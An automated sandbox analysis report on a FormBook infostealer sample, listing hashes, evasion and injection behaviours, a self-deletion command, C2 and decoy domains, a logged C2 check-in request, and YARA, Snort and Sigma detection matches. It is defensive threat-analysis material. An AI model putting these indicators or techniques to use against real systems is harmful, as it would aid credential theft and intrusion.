Windows Analysis Report S9yf6BkjhTQUbHE.exe

Overview

General Information

Sample Name:S9yf6BkjhTQUbHE.exe
Analysis ID:528622
MD5:812861ad5cbb91bfa01a6a15c2cef128
SHA1:ca092e52319047d609cb6fcca1821a8f873416df
SHA256:a649d216b55b0f0597a16690b8469b6b44b9cdc73560d8237387b2df225ab20b
Tags: exe, Formbook

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Performs DNS queries to domains with low reputation
Self deletion via cmd delete
.NET source code contains potential unpacker
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Process Tree

  • System is w10x64
  • S9yf6BkjhTQUbHE.exe (PID: 6344 cmdline: "C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exe" MD5: 812861AD5CBB91BFA01A6A15C2CEF128)
    • S9yf6BkjhTQUbHE.exe (PID: 6408 cmdline: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exe MD5: 812861AD5CBB91BFA01A6A15C2CEF128)
      • explorer.exe (PID: 3472 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • autoconv.exe (PID: 6488 cmdline: C:\Windows\SysWOW64\autoconv.exe MD5: 4506BE56787EDCD771A351C10B5AE3B7)
        • msdt.exe (PID: 6472 cmdline: C:\Windows\SysWOW64\msdt.exe MD5: 7F0C51DBA69B9DE5DDF6AA04CE3A69F4)
          • cmd.exe (PID: 6572 cmdline: /c del "C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.peptidepowder.com/czh8/"], "decoy": ["ekkyo-business.com", "anamentor.com", "criptodigital.online", "smart-device.tech", "piano-tomimoto.com", "sergiojuradomunera.com", "xn----pl8a630b0whm6t.com", "exploitslozdz.xyz", "peregorodki.store", "authenticationtd.net", "ichelbrousset.com", "amboyshops.com", "hengtaigyl.com", "iliubo.com", "overtimersanonymous.com", "crimsonrangellc.com", "otterburnelanding.com", "ping-ken.info", "belezaweb.digital", "elementkultury.com", "heireply.xyz", "membranbakar.xyz", "babygirlletsheal.com", "alpe.paris", "fuslonnd.com", "massaora.com", "geatarotista.com", "namethatsetup.com", "igdxir.com", "tokatyapimarket.com", "soundnox.com", "ase3baeb4p.com", "uniteddatavault.com", "savageequipment.biz", "cutos2.com", "thietketrangtrinhacua.store", "mways-vintage.com", "cloudscapephotos.com", "padelscuolaroma.store", "medeiros.store", "green-umbrella.academy", "kobaran.com", "ilmkibahar.com", "blueworldaquariums.com", "bigjohnblues.com", "e2adriasec.online", "pufaawareskincare.com", "sumerchemicals.com", "epubgame.net", "nuditecouverte.com", "tbpadvogados.website", "cryptoentering.com", "dahliahearing.com", "annellata.xyz", "barberking.online", "cpw882.com", "dock-weiler.com", "dianyuwang.com", "fitpromax.xyz", "deckingtoronto.com", "boundlessentgroup.com", "metricwombat.com", "emergencyhomerepairnetwork.com", "fullerhomeloans.com"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000001.00000002.314660733.0000000000400000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
    00000001.00000002.314660733.0000000000400000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000001.00000002.314660733.0000000000400000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
    • 0x16ae9:$sqlite3step: 68 34 1C 7B E1
    • 0x16bfc:$sqlite3step: 68 34 1C 7B E1
    • 0x16b18:$sqlite3text: 68 38 2A 90 C5
    • 0x16c3d:$sqlite3text: 68 38 2A 90 C5
    • 0x16b2b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16c53:$sqlite3blob: 68 53 D8 7F 8C
    00000001.00000000.250860288.0000000000400000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
      00000001.00000000.250860288.0000000000400000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com

      Unpacked PEs

      Source | Rule | Description | Author | Strings
      1.0.S9yf6BkjhTQUbHE.exe.400000.6.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
        1.0.S9yf6BkjhTQUbHE.exe.400000.6.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
        1.0.S9yf6BkjhTQUbHE.exe.400000.6.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
        1.0.S9yf6BkjhTQUbHE.exe.400000.6.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
          1.0.S9yf6BkjhTQUbHE.exe.400000.6.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com

          Sigma Overview

          System Summary:

          Sigma detected: Possible Applocker Bypass
          Source: Process started, Author: juju4, Data: Command: C:\Windows\SysWOW64\msdt.exe, CommandLine: C:\Windows\SysWOW64\msdt.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\msdt.exe, NewProcessName: C:\Windows\SysWOW64\msdt.exe, OriginalFileName: C:\Windows\SysWOW64\msdt.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3472, ProcessCommandLine: C:\Windows\SysWOW64\msdt.exe, ProcessId: 6472

          Jbx Signature Overview

          AV Detection:

          Found malware configuration
          Source: 00000001.00000002.314660733.0000000000400000.00000040.00000001.sdmp, Malware Configuration Extractor: FormBook
          Multi AV Scanner detection for submitted file
          Source: S9yf6BkjhTQUbHE.exe, ReversingLabs: Detection: 22%
          Yara detected FormBook
          Source: Yara match, File source: 1.0.S9yf6BkjhTQUbHE.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 1.0.S9yf6BkjhTQUbHE.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 1.0.S9yf6BkjhTQUbHE.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 1.0.S9yf6BkjhTQUbHE.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 1.2.S9yf6BkjhTQUbHE.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 1.2.S9yf6BkjhTQUbHE.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 1.0.S9yf6BkjhTQUbHE.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 00000001.00000002.314660733.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000001.00000000.250860288.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000012.00000002.514724044.00000000008D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000012.00000002.518773545.0000000002FA0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000004.00000000.288279316.000000000EC4A000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000001.00000002.314889663.0000000000A20000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000004.00000000.305725796.000000000EC4A000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000000.00000002.256688867.00000000041A8000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000001.00000000.251285298.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000001.00000002.314919624.0000000000A50000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000000.00000002.254885571.0000000003F8D000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000012.00000002.518592905.0000000002E90000.00000040.00020000.sdmp, type: MEMORY
          Source: 1.0.S9yf6BkjhTQUbHE.exe.400000.8.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.0.S9yf6BkjhTQUbHE.exe.400000.6.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.0.S9yf6BkjhTQUbHE.exe.400000.4.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.2.S9yf6BkjhTQUbHE.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
          Source: S9yf6BkjhTQUbHE.exe, Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: S9yf6BkjhTQUbHE.exe, Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: msdt.pdbGCTL source: S9yf6BkjhTQUbHE.exe, 00000001.00000002.316216528.00000000013C0000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdbUGP source: S9yf6BkjhTQUbHE.exe, 00000001.00000002.315540875.00000000011AF000.00000040.00000001.sdmp, S9yf6BkjhTQUbHE.exe, 00000001.00000002.315139597.0000000001090000.00000040.00000001.sdmp, msdt.exe, 00000012.00000002.520823591.0000000004D9F000.00000040.00000001.sdmp, msdt.exe, 00000012.00000002.520500167.0000000004C80000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: S9yf6BkjhTQUbHE.exe, S9yf6BkjhTQUbHE.exe, 00000001.00000002.315540875.00000000011AF000.00000040.00000001.sdmp, S9yf6BkjhTQUbHE.exe, 00000001.00000002.315139597.0000000001090000.00000040.00000001.sdmp, msdt.exe, msdt.exe, 00000012.00000002.520823591.0000000004D9F000.00000040.00000001.sdmp, msdt.exe, 00000012.00000002.520500167.0000000004C80000.00000040.00000001.sdmp
          Source: Binary string: msdt.pdb source: S9yf6BkjhTQUbHE.exe, 00000001.00000002.316216528.00000000013C0000.00000040.00020000.sdmp
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exe, Code function: 4x nop then pop edi, 1_2_004162EC
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exe, Code function: 4x nop then pop edi, 1_2_0040C41D
          Source: C:\Windows\SysWOW64\msdt.exe, Code function: 4x nop then pop edi, 18_2_008E62EC
          Source: C:\Windows\SysWOW64\msdt.exe, Code function: 4x nop then pop edi, 18_2_008DC41D

          Networking:

          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
          Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49827 -> 34.117.168.233:80
          Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49827 -> 34.117.168.233:80
          Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49827 -> 34.117.168.233:80
          Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49837 -> 198.54.117.218:80
          Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49837 -> 198.54.117.218:80
          Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49837 -> 198.54.117.218:80
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exe, Domain query: www.xn----pl8a630b0whm6t.com
          Source: C:\Windows\explorer.exe, Domain query: www.epubgame.net
          Source: C:\Windows\explorer.exe, Network Connect: 23.106.123.249 80
          Source: C:\Windows\explorer.exe, Network Connect: 172.67.178.31 80
          Source: C:\Windows\explorer.exe, Domain query: www.anamentor.com
          Source: C:\Windows\explorer.exe, Domain query: www.fuslonnd.com
          Source: C:\Windows\explorer.exe, Domain query: www.annellata.xyz
          Source: C:\Windows\explorer.exe, Domain query: www.metricwombat.com
          Performs DNS queries to domains with low reputation
          Source: C:\Windows\explorer.exe, DNS query: www.annellata.xyz
          Source: DNS query: www.exploitslozdz.xyz
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractor, URLs: www.peptidepowder.com/czh8/
          Source: Joe Sandbox View, ASN Name: LEASEWEB-APAC-SIN-11LeasewebAsiaPacificpteltdSG
          Source: Joe Sandbox View, ASN Name: CLOUDFLARENETUS
          Source: global traffic, HTTP traffic detected: GET /czh8/?7n=IRLjoLIXlWieDd548KoJS/rowvlX7n5q7mSRLwbc7H8jLvnjYG+pwFiMTHdBlEYfNNBf&t4b=Zn-L HTTP/1.1 Host: www.anamentor.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox View, IP Address: 23.106.123.249
          Source: S9yf6BkjhTQUbHE.exe, 00000000.00000002.254291450.000000000304A000.00000004.00000001.sdmp, S9yf6BkjhTQUbHE.exe, 00000000.00000002.254094379.0000000002F81000.00000004.00000001.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: msdt.exe, 00000012.00000002.519445044.000000000315F000.00000004.00000020.sdmp, String found in binary or memory: http://www.xn----pl8a630b0whm6t.com/czh8/?7n=WfBFmY7eHt5QBShHhdd2jwwFQU0Qfs4ciJop7u3ZFFtbwI7iz04mk8i
          Source: msdt.exe, 00000012.00000002.521258705.0000000005332000.00000004.00020000.sdmp, String found in binary or memory: https://www.anamentor.com/czh8/?7n=IRLjoLIXlWieDd548KoJS/rowvlX7n5q7mSRLwbc7H8jLvnjYG
          Source: unknown, DNS traffic detected: queries for: www.epubgame.net
          Source: S9yf6BkjhTQUbHE.exe, 00000000.00000002.253365121.00000000011E9000.00000004.00000020.sdmp, Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

          E-Banking Fraud:

          Yara detected FormBook

          System Summary:

          Malicious sample detected (through community Yara rule)
          Source: 1.0.S9yf6BkjhTQUbHE.exe.400000.6.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.0.S9yf6BkjhTQUbHE.exe.400000.6.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 1.0.S9yf6BkjhTQUbHE.exe.400000.6.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.0.S9yf6BkjhTQUbHE.exe.400000.6.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 1.0.S9yf6BkjhTQUbHE.exe.400000.8.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.0.S9yf6BkjhTQUbHE.exe.400000.8.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 1.0.S9yf6BkjhTQUbHE.exe.400000.4.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.0.S9yf6BkjhTQUbHE.exe.400000.4.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 1.2.S9yf6BkjhTQUbHE.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.S9yf6BkjhTQUbHE.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 1.2.S9yf6BkjhTQUbHE.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.S9yf6BkjhTQUbHE.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 1.0.S9yf6BkjhTQUbHE.exe.400000.8.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.0.S9yf6BkjhTQUbHE.exe.400000.8.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.314660733.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.314660733.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000000.250860288.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000000.250860288.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000012.00000002.514724044.00000000008D0000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000012.00000002.514724044.00000000008D0000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000012.00000002.518773545.0000000002FA0000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000012.00000002.518773545.0000000002FA0000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000000.288279316.000000000EC4A000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000000.288279316.000000000EC4A000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.314889663.0000000000A20000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.314889663.0000000000A20000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000000.305725796.000000000EC4A000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000000.305725796.000000000EC4A000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.256688867.00000000041A8000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.256688867.00000000041A8000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000000.251285298.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000000.251285298.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.314919624.0000000000A50000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.314919624.0000000000A50000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.254885571.0000000003F8D000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.254885571.0000000003F8D000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000012.00000002.518592905.0000000002E90000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000012.00000002.518592905.0000000002E90000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: S9yf6BkjhTQUbHE.exe, Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 1.0.S9yf6BkjhTQUbHE.exe.400000.6.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.0.S9yf6BkjhTQUbHE.exe.400000.6.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.S9yf6BkjhTQUbHE.exe.400000.6.unpack, type: UNPACKEDPE, Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.0.S9yf6BkjhTQUbHE.exe.400000.6.unpack, type: UNPACKEDPE, Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.S9yf6BkjhTQUbHE.exe.400000.8.unpack, type: UNPACKEDPE, Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.0.S9yf6BkjhTQUbHE.exe.400000.8.unpack, type: UNPACKEDPE, Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.S9yf6BkjhTQUbHE.exe.400000.4.unpack, type: UNPACKEDPE, Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.0.S9yf6BkjhTQUbHE.exe.400000.4.unpack, type: UNPACKEDPE, Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.S9yf6BkjhTQUbHE.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.S9yf6BkjhTQUbHE.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.S9yf6BkjhTQUbHE.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.S9yf6BkjhTQUbHE.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.S9yf6BkjhTQUbHE.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.0.S9yf6BkjhTQUbHE.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.314660733.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.314660733.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000000.250860288.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000000.250860288.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000012.00000002.514724044.00000000008D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
